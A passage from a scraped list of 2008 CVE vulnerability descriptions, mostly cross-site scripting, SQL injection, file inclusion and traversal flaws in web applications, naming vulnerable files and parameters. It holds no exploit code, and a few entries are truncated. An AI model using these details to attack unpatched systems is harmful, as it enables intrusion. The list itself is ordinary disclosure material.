(XSS) vulnerabilities in PD9 Software MegaBBS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) toid parameter to send-private-message.asp and the (2) redirect parameter to admin/impersonate.asp. NOTE: vector 2 requires authentication. [CVE-2008-2020] The CAPTCHA implementation as used in (1) Francisco Burzi PHP-Nuke 7.0 and 8.1, (2) my123tkShop e-Commerce-Suite (aka 123tkShop) 0.9.1, (3) phpMyBitTorrent 1.2.2, (4) TorrentFlux 2.3, (5) e107 0.7.11, (6) WebZE 0.5.9, (7) Open Media Collectors Database (aka OpenDb) 1.5.0b4, and (8) Labgab 1.1 uses a code_bg.jpg background image and the PHP ImageString function in a way that produces an insufficient number of different images, which allows remote attackers to pass the CAPTCHA test via an automated attack using a table of all possible image checksums and their corresponding digit strings. [CVE-2008-2011] Cross-site scripting (XSS) vulnerability in the National Rail Enquiries Live Departure Boards gadget before 1.1 allows remote National Rail Enquiries servers or man-in-the-middle attackers to inject arbitrary web script or HTML, and execute arbitrary code, via a response body, as demonstrated by a SCRIPT element that references a vbscript: URI. [CVE-2008-2003] BadBlue 2.72 Personal Edition stores multiple programs in the web document root with insufficient access control, which allows remote attackers to (1) cause a denial of service via multiple invocations of uninst.exe, and have an unknown impact via (2) badblue.exe and (3) dyndns.exe. NOTE: this can be leveraged for arbitrary remote code execution in conjunction with CVE-2007-6378. [CVE-2008-1991] Cross-site scripting (XSS) vulnerability in admin_colors_swatch.asp in Acidcat CMS 3.4.1 allows remote attackers to inject arbitrary web script or HTML via the field parameter. [CVE-2008-1987] Cross-site scripting (XSS) vulnerability in search.php in EncapsGallery 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2008-1986] Cross-site scripting (XSS) vulnerability in liste_article.php in Blog Pixel Motion (aka PixelMotion) allows remote attackers to inject arbitrary web script or HTML via the jours parameter. [CVE-2008-1985] Cross-site scripting (XSS) vulnerability in base.php in DigitalHive 2.0 RC2 allows remote attackers to inject arbitrary web script or HTML via the mt parameter, possibly related to membres.php. [CVE-2008-1983] Cross-site scripting (XSS) vulnerability in Advanced Electron Forum (AEF) 1.0.6 allows remote attackers to inject arbitrary web script or HTML via the beg parameter in a members action to index.php. [CVE-2008-1980] Cross-site scripting (XSS) vulnerability in E-Publish 5.x before 5.x-1.1 and 6.x before 6.x-1.0 beta1, a Drupal module, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1978] Cross-site scripting (XSS) vulnerability in the Ubercart 5.x before 5.x-1.0 rc3 module for Drupal allows remote authenticated users to inject arbitrary web script or HTML via node titles related to unspecified product features, a different vector than CVE-2008-1428. [CVE-2008-1974] Cross-site scripting (XSS) vulnerability in addevent.php in Horde Kronolith 2.1.7, Groupware Webmail Edition 1.0.6, and Groupware 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2008-1972] Multiple cross-site scripting (XSS) vulnerabilities in the user account creation feature in Exponent CMS 0.96.6-GA20071003 and earlier, when the Allow Registration? configuration option is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) firstname, (3) lastname, and (4) e-mail address fields. NOTE: some of these details are obtained from third party information. [CVE-2008-1969] Multiple cross-site scripting (XSS) vulnerabilities in Cezanne 6.5.1 and 7 allow remote attackers to inject arbitrary web script or HTML via the (1) LookUPId and (2) CbFun parameters to (a) CFLookUP.asp [CVE-2008-1967] Cross-site scripting (XSS) vulnerability in CFLogon/CFLogon.asp in Cezanne 6.5.1 and 7 allows remote attackers to inject arbitrary web script or HTML via the SleUserName parameter. [CVE-2008-1963] PHP remote file inclusion vulnerability in includes/functions.php in Quate Grape Web Statistics 0.2a allows remote attackers to execute arbitrary PHP code via a URL in the location parameter. [CVE-2008-1961] SQL injection vulnerability in index.php in Voice Of Web AllMyGuests 0.4.1 allows remote attackers to execute arbitrary SQL commands via the AMG_id parameter in a comments action. [CVE-2008-1960] Cross-site scripting (XSS) vulnerability in cgi-bin/contray/search.cgi in ContRay 3.x allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown [CVE-2008-1956] Cross-site scripting (XSS) vulnerability in index.php in Wikepage Opus 13 2007.2 allows remote attackers to inject arbitrary web script or HTML via the wiki parameter. [CVE-2008-1955] Cross-site scripting (XSS) vulnerability in rep.php in Martin BOUCHER MyBoard 1.0.12 allows remote attackers to inject arbitrary web script or HTML via the id parameter. information. [CVE-2008-1954] SQL injection vulnerability in one_day.php in Web Calendar Pro 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via the user_id parameter. [CVE-2008-1953] Cross-site scripting (XSS) vulnerability in the Sitedesigner before 1.1.5 search template in Magnolia Enterprise Edition allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add. [CVE-2008-1941] Cross-site scripting (XSS) vulnerability in the profile update feature in Akiva WebBoard 8.0 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in the form field. NOTE: the provenance of this information is unknown [CVE-2008-1938] Sony Mylo COM-2 Japanese model firmware before 1.002 does not properly verify web server SSL certificates, which allows remote attackers to obtain sensitive information and conduct spoofing attacks. [CVE-2008-1917] Multiple cross-site scripting (XSS) vulnerabilities in AMFPHP 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) class parameter to (a) methodTable.php, (b) code.php, and (c) details.php in browser/ [CVE-2008-1916] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart 5.x before 5.x-1.0-rc1 module for Drupal allow remote attackers to inject arbitrary web script or HTML via text fields intended for the (1) address and (2) order information, which are later displayed on the order view page and unspecified other administrative pages, a different vulnerability than CVE-2008-1428. [CVE-2008-1906] Cross-site scripting (XSS) vulnerability in calendar.php in cpCommerce 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the year parameter in a view.year action. [CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call. [CVE-2008-1896] Multiple cross-site scripting (XSS) vulnerabilities in Carbon Communities 2.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Redirect parameter to login.asp and the (2) OrderBy parameter to member_send.asp. [CVE-2008-1894] Cross-site scripting (XSS) vulnerability in desktoplaunch/InfoView/logon/logon.object in BusinessObjects InfoView XI R2 SP1, SP2, and SP3 Java version before FixPack 3.5 allows remote attackers to inject arbitrary web script or HTML via the cms parameter. [CVE-2008-1892] Cross-site scripting (XSS) vulnerability in bs_auth.php in Blogator-script 0.95 and 1.01 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown [CVE-2008-1891] Directory traversal vulnerability in WEBrick in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1886] The NeffyLauncher 1.0.5 ActiveX control (NeffyLauncher.dll) in CDNetworks Nefficient Download uses weak cryptography for a KeyCode that blocks unauthorized use of the control, which allows remote attackers to bypass this protection mechanism by calculating the required KeyCode. NOTE: this can be used by arbitrary web sites to host exploit code that targets this control. [CVE-2008-1875] SQL injection vulnerability in index.php in Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 allows remote attackers to execute arbitrary SQL commands via the photo_id parameter. [CVE-2008-1873] Cross-site scripting (XSS) vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-1854] Unspecified vulnerability in SmarterMail Web Server (SMWebSvr.exe) in SmarterMail 5.0.2999 allows remote attackers to cause a denial of service (service termination) via a long HTTP (1) GET, (2) HEAD, (3) PUT, (4) POST, or (5) TRACE request. NOTE: the provenance of this information is unknown [CVE-2008-1850] Multiple cross-site scripting (XSS) vulnerabilities in login.php in Omnistar Interactive OSI Affiliate allow remote attackers to inject arbitrary web script or HTML via the (1) login, (2) profile, (3) profile2, and (4) ref parameters. [CVE-2008-1848] Cross-site scripting (XSS) vulnerability in the joomlaXplorer (com_joomlaxplorer) Mambo/Joomla! component 1.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter in a show_error action to index.php. [CVE-2008-1839] Multgiple cross-site scripting (XSS) vulnerabilities in module/main.php in WORK system e-commerce 4.0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) day, (2) month, and (3) year parameters. NOTE: the provenance of this information is unknown [CVE-2008-1800] Multiple cross-site scripting (XSS) vulnerabilities in index.php in DivXDB 2002 0.94b allow remote attackers to inject arbitrary web script or HTML via the (1) choice, (2) _page_, (3) zone_admin, (4) general_search, and (5) import parameters. NOTE: the provenance of this information is unknown [CVE-2008-1797] Unspecified vulnerability in Secure Computing Webwasher 5.30 before build 3159 and 6.3.0 before build 3150 allows remote attackers to cause a denial of service (freeze) via a crafted URL. [CVE-2008-1795] Multiple cross-site scripting (XSS) vulnerabilities in Blackboard Academic Suite 7.x and earlier, and possibly some 8.0 versions, allow remote attackers to inject arbitrary web script or HTML via (1) the searchText parameter in a Course action to webapps/blackboard/execute/viewCatalog or (2) the data__announcements___pk1_pk2__subject parameter in an ADD action to bin/common/announcement.pl. [CVE-2008-1794] Multiple cross-site scripting (XSS) vulnerabilities in the Webform Drupal module 5.x before 5.x-1.10, 5.x-2.x before 5.x-2.0-beta3, and 6.x before 6.x-1.0-beta3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1793] Multiple cross-site scripting (XSS) vulnerabilities in view.cgi in Smart Classified ADS Professional, Smart Photo ADS, and Smart Photo ADS Gold allow remote attackers to inject arbitrary web script or HTML via the (1) AdNum and (2) Department parameters. NOTE: the provenance of this information is unknown [CVE-2008-1792] Cross-site scripting (XSS) vulnerability in the insertion filter in the Flickr Drupal module 5.x before 5.x-1.3 and 6.x before 6.x-1.0-alpha allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1787] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Poplar Gedcom Viewer 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) text and (2) ul parameters. NOTE: the provenance of this information is unknown [CVE-2008-1775] Cross-site scripting (XSS) vulnerability in mindex.do in ManageEngine Firewall Analyzer 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the displayName parameter. NOTE: the provenance of this information is unknown [CVE-2008-1757] Cross-site scripting (XSS) vulnerability in index.php in the ConcoursPhoto module for KwsPHP 1.0 allows remote attackers to inject arbitrary web script or HTML via the VIEW parameter. [CVE-2008-1753] Cross-site scripting (XSS) vulnerability in system/workplace/admin/workplace/sessions.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the searchfilter parameter, a different vector than CVE-2008-1510. [CVE-2008-1752] ezRADIUS 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain credentials via a direct request for (1) config.ini or (2) database.ini. NOTE: some of these details are obtained from third party information. [CVE-2008-1716] Cross-site scripting (XSS) vulnerability in WoltLab Community Framework (WCF) 1.0.6 in WoltLab Burning Board 3.0.5 allows remote attackers to inject arbitrary web script or HTML via the (1) page and (2) form parameters, which are not properly handled when they are reflected back in an error message. [CVE-2008-1712] PHP remote file inclusion vulnerability in includes/functions_weblog.php in mxBB mx_blogs 2.0.0 beta allows remote attackers to execute arbitrary PHP code via a URL in the mx_root_path parameter. [CVE-2008-1711] Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information. [CVE-2008-1700] The Web TransferCtrl Class 8,2,1,4 (iManFile.cab), as used in WorkSite Web 8.2 before SP1 P2, allows remote attackers to cause a denial of service (memory consumption) via a large number of SendNrlLink directives, which opens a separate window for each directive. [CVE-2008-1698] Cross-site scripting (XSS) vulnerability in gallery.php in Simple Gallery 2.2 allows remote attackers to inject arbitrary web script or HTML via the album parameter to index.php. NOTE: the provenance of this information is unknown [CVE-2008-1690] WebContainer.exe 1.0.0.336 and earlier in SLMail Pro 6.3.1.0 and earlier allows remote attackers to cause a denial of service (memory corruption and daemon crash) or possibly execute arbitrary code via a long URI in HTTP requests to TCP port 801. NOTE: some of these details are obtained from third party information. [CVE-2008-1689] Stack consumption vulnerability in WebContainer.exe 1.0.0.336 and earlier in SLMail Pro 6.3.1.0 and earlier allows remote attackers to cause a denial of service (daemon crash) via a long request header in an HTTP request to TCP port 801. NOTE: some of these details are obtained from third party information. [CVE-2008-1663] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) 2.1.10 and 2.1.11 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1649] Cross-site scripting (XSS) vulnerability in staticpages/easypublish/index.php in EasyNews 4.0 allows remote attackers to inject arbitrary web script or HTML via the read parameter in an edp_pupublish action. [CVE-2008-1639] SQL injection vulnerability in index.php in Neat weblog 0.2 allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a show action, probably related to the showArticle function in lib/lib_article.include.php. [CVE-2008-1636] Cross-site scripting (XSS) vulnerability in index.php in JV2 Quick Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the f parameter. NOTE: the provenance of this information is unknown [CVE-2008-1634] Cross-site scripting (XSS) vulnerability in index.php in JV2 Folder Gallery 3.1 allows remote attackers to inject arbitrary web script or HTML via the image parameter. NOTE: the provenance of this information is unknown [CVE-2008-1630] Multiple cross-site scripting (XSS) vulnerabilities in CuteFlow 1.5.0 and 2.10.0 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) page/showcirculation.php [CVE-2008-1629] Cross-site scripting (XSS) vulnerability in PHPkrm before 1.5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1621] Multiple cross-site scripting (XSS) vulnerabilities in GeeCarts allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) show.php, (2) search.php, and (3) view.php. NOTE: the provenance of this information is unknown [CVE-2008-1617] Double free vulnerability in Web TransferCtrl Class 8,2,1,4 (iManFile.cab), as used in WorkSite Web 8.2 before SP1 P2, allows remote attackers to execute arbitrary code via JavaScript that sets the Server property to a string, then sets the string to null. [CVE-2008-1609] Multiple PHP remote file inclusion vulnerabilities in just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) website parameter to (a) forum.php, (b) headlines.php, and (c) main.php in forum/, and (2) main_dir parameter to forum/forum.php. NOTE: other main_dir vectors are already covered by CVE-2006-7127. [CVE-2008-1604] Cross-site scripting (XSS) vulnerability in PerlMailer before 3.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1603] Cross-site scripting (XSS) vulnerability in GNB DesignForm before 3.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the email form. [CVE-2008-1592] MQSeries 5.1 in IBM WebSphere MQ 5.1 through 5.3.1 on the HP NonStop and Tandem NSK platforms does not require mqm group membership for execution of administrative tasks, which allows local users to bypass intended access restrictions via the runmqsc program, related to "Pathway panels." [CVE-2008-1590] JavaScriptCore in WebKit on Apple iPhone before 2.0 and iPod touch before 2.0 does not properly perform runtime garbage collection, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors that trigger memory corruption, a different vulnerability than CVE-2008-2317. [CVE-2008-1589] Safari on Apple iPhone before 2.0 and iPod touch before 2.0 misinterprets a menu button press as user confirmation for visiting a web site with a (1) self-signed or (2) invalid certificate, which makes it easier for remote attackers to spoof web sites. [CVE-2008-1580] CFNetwork in Safari in Apple Mac OS X before 10.5.3 automatically sends an SSL client certificate in response to a web server's certificate request, which allows remote web sites to obtain sensitive information (Subject data) from personally identifiable certificates, and use arbitrary certificates to track user activities across domains, a related issue to CVE-2007-4879. [CVE-2008-1571] Directory traversal vulnerability in the embedded web server in Image Capture in Apple Mac OS X before 10.5 allows remote attackers to read arbitrary files via directory traversal sequences in the URI. [CVE-2008-1566] Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine Applications Manager 8.x allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown [CVE-2008-1560] Multiple cross-site scripting (XSS) vulnerabilities in Digiappz DigiDomain 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) domain parameter to lookup_result.asp, and the (2) word1 and (3) word2 parameters to suggest_result.asp. [CVE-2008-1556] Multiple cross-site scripting (XSS) vulnerabilities in BolinOS 4.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) system/actionspages/_b/contentFiles/gBImageViewer.php, (2) ForEditor parameter to (b) system/actionspages/_b/contentFiles/gBselectorContents.php, (3) the PATH_INFO to (c) gBLoginPage.php and (d) gBPassword.php in system/actionspages/_b/contentFiles/, (4) formlogin parameter to system/actionspages/_b/contentFiles/gBLoginPage.php, and the (5) bolini_searchengine46Search parameter to (e) help/index.php. [CVE-2008-1550] Multiple cross-site scripting (XSS) vulnerabilities in index.php in CubeCart 4.2.1 allow remote attackers to inject arbitrary web script or HTML via (1) the _a parameter in a searchStr action and the (2) Submit parameter. [CVE-2008-1549] Multiple SQL injection vulnerabilities in Aeries Browser Interface (ABI) 3.8.3.14 in Eagle Software Aries Student Information System allow remote attackers to execute arbitrary SQL commands via the (1) GrdBk parameter to GradebookOptions.asp and the (2) SchlCode variable to loginproc.asp, a different vector than CVE-2008-0942. [CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. [CVE-2008-1546] servlet/MIMEReceiveServlet in the web controller for Mitsubishi Electric GB-50 and GB-50A air-conditioning control systems allows remote attackers to cause a denial of service (air-conditioning outage) via an XML document containing a setRequest command. [CVE-2008-1541] Directory traversal vulnerability in cgi-bin/his-webshop.pl in HIS Webshop 2.50 allows remote attackers to read arbitrary files via a .. (dot dot) in the t parameter. [CVE-2008-1538] Cross-site scripting (XSS) vulnerability in searchAction.do in ManageEngine EventLog Analyzer 5 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown [CVE-2008-1536] Cross-site scripting (XSS) vulnerability in index.php in Pictures Pro (aka Tim Grissett) Photo Cart 4.1 allows remote attackers to inject arbitrary web script or HTML via the amessage parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-1515] The SOAP interface in OTRS 2.1.x before 2.1.8 and 2.2.x before 2.2.6 allows remote attackers to "read and modify objects" via SOAP requests, related to "Missing security checks." [CVE-2008-1510] Cross-site scripting (XSS) vulnerability in system/workplace/admin/accounts/users_list.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the (1) searchfilter or (2) listSearchFilter parameter. [CVE-2008-1504] Cross-site scripting (XSS) vulnerability in setup.php3 in phpHeaven phpMyChat 0.14.5 allows remote attackers to inject arbitrary web script or HTML via the Lang parameter. NOTE: the provenance of this information is unknown [CVE-2008-1500] Cross-site scripting (XSS) vulnerability in index.php in TinyPortal 0.8.6 and 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter. NOTE: the provenance of this information is unknown [CVE-2008-1499] Cross-site scripting (XSS) vulnerability in frontend/x/manpage.html in cPanel 11.18.3 and 11.21.0-BETA allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2008-1487] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via (1) ftp/index.php, (2) viewer.php, (3) functions/other.php, (4) include/left_menu.class.php, and (5) plugins/stats/stats_view.php. [CVE-2008-1485] Cross-site scripting (XSS) vulnerability in PunBB 1.2.16 and earlier allows remote attackers to inject arbitrary web script or HTML via the get_host parameter to moderate.php. [CVE-2008-1481] Cross-site scripting (XSS) vulnerability in index.php in webSPELL 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the board parameter. NOTE: the provenance of this information is unknown [CVE-2008-1479] Cross-site scripting (XSS) vulnerability in index.php in cyberfrogs.net cfnetgs 0.24 allows remote attackers to inject arbitrary web script or HTML via the directory parameter. NOTE: the provenance of this information is unknown [CVE-2008-1477] Multiple cross-site scripting (XSS) vulnerabilities in busca.php in eForum 0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) busca and (2) link parameters. [CVE-2008-1476] Cross-site scripting (XSS) vulnerability in Serendipity (S9Y) before 1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to received trackbacks. [CVE-2008-1470] Incomplete blacklist vulnerability in IISWebAgentIF.dll in the WebID RSA Authentication Agent 5.3, and possibly earlier, allows remote attackers to conduct cross-site scripting (XSS) attacks via the postdata parameter, due to an incomplete fix for CVE-2005-1118. [CVE-2008-1468] Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information. [CVE-2008-1463] Cross-site scripting (XSS) vulnerability in the management GUI in Imperva SecureSphere MX Management Server 5.0 allows remote attackers to inject arbitrary web script or HTML via an invalid or prohibited request to a web server protected by SecureSphere, which triggers injection into the "corrective action" section of an alert page. [CVE-2008-1458] Cross-site scripting (XSS) vulnerability in index.php in CS-Cart 1.3.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a products search action. NOTE: it was also reported that 1.3.5-SP2 trial edition is also affected. [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1432] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine SupportCenter Plus 7.0.0 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter, a related issue to CVE-2008-1299. NOTE: the provenance of this information is unknown [CVE-2008-1428] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart 5.x before 5.x-1.0-beta7 module for Drupal allow remote attackers to inject arbitrary web script or HTML via a text attribute value for a product. [CVE-2008-1414] Cross-site scripting (XSS) vulnerability in Multiple Time Sheets (MTS) 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the tab parameter to (1) index.php, as demonstrated using mixed case and encoded whitespace characters in the tag [CVE-2008-1413] Cross-site scripting (XSS) vulnerability in search.php in SNewsCMS Rus 2.1 through 2.4 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2008-1407] SQL injection vulnerability in index.php in the WebChat 1.60 module for eXV2 allows remote attackers to execute arbitrary SQL commands via the roomid parameter. [CVE-2008-1399] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Clansphere 2008 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2008-1397] Check Point VPN-1 Power/UTM, with NGX R60 through R65 and NG AI R55 software, allows remote authenticated users to cause a denial of service (site-to-site VPN tunnel outage), and possibly intercept network traffic, by configuring the local RFC1918 IP address to be the same as one of this tunnel's endpoint RFC1918 IP addresses, and then using SecuRemote to connect to a network interface at the other endpoint. [CVE-2008-1386] Multiple cross-site scripting (XSS) vulnerabilities in the installer in Serendipity (S9Y) 1.3 allow remote attackers to inject arbitrary web script or HTML via (1) unspecified path fields or (2) the database host field. NOTE: the timing window for exploitation of this issue might be limited. [CVE-2008-1385] Cross-site scripting (XSS) vulnerability in the Top Referrers (aka referrer) plugin in Serendipity (S9Y) before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header. [CVE-2008-1380] The JavaScript engine in Mozilla Firefox before 2.0.0.14, Thunderbird before 2.0.0.14, and SeaMonkey before 1.1.10 allows remote attackers to cause a denial of service (garbage collector crash) and possibly have other impacts via a crafted web page. NOTE: this is due to an incorrect fix for CVE-2008-1237. [CVE-2008-1360] Cross-site scripting (XSS) vulnerability in Nagios before 2.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts, a different issue than CVE-2007-5624. [CVE-2008-1359] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB or IP.Board) 2.3.4 before 2008-03-13 allows remote attackers to inject arbitrary web script or HTML via nested BBCodes, a different vector than CVE-2008-0913. [CVE-2008-1355] Cross-site scripting (XSS) vulnerability in index.php in Jeebles Technology Jeebles Directory 2.9.60 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: the provenance of this information is unknown [CVE-2008-1348] Cross-site scripting (XSS) vulnerability in index.php in the eWebsite eWeather (Weather) module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the chart parameter to modules.php. [CVE-2008-1347] Multiple cross-site scripting (XSS) vulnerabilities in staticpages/easygallery/index.php in MyioSoft EasyGallery 5.0tr and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) the q parameter in an about action to the help system. [CVE-2008-1345] Cross-site scripting (XSS) vulnerability in plugins/calendar/calendar_backend.php in MyioSoft EasyCalendar 4.0tr and earlier allows remote attackers to inject arbitrary web script or HTML via the day parameter in a dayview action. [CVE-2008-1342] Multiple cross-site scripting (XSS) vulnerabilities in the search feature in Polymita BPM-Suite and CollagePortal allow remote attackers to inject arbitrary web script or HTML via the (1) _q and (2) lucene_index_field_value parameters. NOTE: the provenance of this information is unknown [CVE-2008-1340] Virtual Machine Communication Interface (VMCI) in VMware Workstation 6.0.x before 6.0.3, VMware Player 2.0.x before 2.0.3, and VMware ACE 2.0.x before 2.0.1 allows attackers to cause a denial of service (host OS crash) via crafted VMCI calls that trigger "memory exhaustion and memory corruption." [CVE-2008-1326] Cross-site scripting (XSS) vulnerability in search.php in Gallarific allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown [CVE-2008-1306] Multiple cross-site scripting (XSS) vulnerabilities in Savvy Content Manager (CM) allow remote attackers to inject arbitrary web script or HTML via the searchterms parameter to (1) searchresults.cfm, (2) search_results.cfm, and (3) search_results/index.cfm. NOTE: the provenance of this information is unknown [CVE-2008-1304] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) inviteemail parameter in an invite action to wp-admin/users.php and the (2) to parameter in a sent action to wp-admin/invites.php. [CVE-2008-1300] Cross-site scripting (XSS) vulnerability in the Logfile Viewer Settings function in system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp in Alkacon OpenCms 7.0.3 and 7.0.4 allows remote attackers to inject arbitrary web script or HTML via the filePath.0 parameter in a save action, a different vector than CVE-2008-1045. [CVE-2008-1299] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown [CVE-2008-1296] Multiple cross-site scripting (XSS) vulnerabilities in EncapsGallery 1.11.2 allow remote attackers to inject arbitrary web script or HTML via the file parameter to (1) watermark.php and (2) catalog_watermark.php in core/. NOTE: the provenance of this information is unknown [CVE-2008-1291] ViewVC before 1.0.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read files and list folders under the hidden CVSROOT folder. [CVE-2008-1286] Unspecified vulnerability in Sun Java Web Console 3.0.2, 3.0.3, and 3.0.4 allows remote attackers to bypass intended access restrictions and determine the existence of files or directories via unknown vectors. [CVE-2008-1285] Cross-site scripting (XSS) vulnerability in Sun Java Server Faces (JSF) 1.2 before 1.2_08 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-1284] Directory traversal vulnerability in Horde 3.1.6, Groupware before 1.0.5, and Groupware Webmail Edition before 1.0.6, when running with certain configurations, allows remote authenticated users to read and execute arbitrary files via ".." sequences and a null byte in the theme name. [CVE-2008-1283] Cross-site scripting (XSS) vulnerability in Neptune Web Server 3.0 allows remote attackers to inject arbitrary web script or HTML via the URI, which is not properly handled in the 404 error page. [CVE-2008-1273] Multiple cross-site scripting (XSS) vulnerabilities in imageVue 1.7 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) popup.php, (2) test/dir2.php, (3) admin/upload.php, and (4) dirxml.php in upload/. NOTE: the provenance of this information is unknown [CVE-2008-1265] The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. [CVE-2008-1258] Cross-site scripting (XSS) vulnerability in prim.htm on the D-Link DI-604 router allows remote attackers to inject arbitrary web script or HTML via the rf parameter. [CVE-2008-1257] Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or 